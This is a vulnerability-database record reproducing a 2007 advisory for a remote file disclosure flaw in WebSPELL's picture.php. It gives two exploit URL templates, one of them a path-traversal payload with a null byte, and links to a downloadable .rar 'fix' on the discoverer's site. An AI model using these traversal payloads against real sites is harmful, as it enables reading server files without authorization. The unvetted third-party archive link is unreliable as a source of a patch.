DATABASE RESOURCES PRICING ABOUT US

{"id": "SECURITYVULNS:DOC:16679", "bulletinFamily": "software", "title": "WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability", "description": "# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability\r\n# Discovered by: Trex\r\n# Visit: www.Trex-Online.net / www.UnderGround.ag\r\n# Comment: Happy easter!\r\n#\r\n# ___ ___\r\n# / \ / \ ___________________________\r\n# / / \_/ \ \ / \\r\n# \__/\ /\__/ / GIVE ME A CARROT OR I WILL \\r\n# \O O/ \ BLOW UP YOUR HOUSE /\r\n# ___/ ^ \___ / ___________________________/\r\n# \___/ /_/\r\n# _/ \_\r\n# __// \\__\r\n# /___\/_\/___\\r\n#\r\n#\r\n#\r\n# Vulnerability 1:\r\n# Advantage: works independently from PHP version.\r\n# Disadvantage: works dependently from PHP option register_globals (= on).\r\n#\r\n# http://[SITE][PAHT]/picture.php?file=[FILE]\r\n#\r\n#\r\n#\r\n# Vulnerability 2:\r\n# Advantage: works independently from PHP option register_globals.\r\n# Disadvantage: works dependently from PHP versions (< 4.3.0).\r\n#\r\n# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00\r\n#\r\n#\r\n#\r\n# Solution:\r\n# http://fixes.trex-online.net/picture.rar\r\n\r\n# milw0rm.com [2007-04-05]", "published": "2007-04-12T00:00:00", "modified": "2007-04-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16679", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 150, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7570"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645580556, "score": 1659803227}, "_internal": {"score_hash": "4d1f31df545c5e88b7b99795c2308249"}}

{}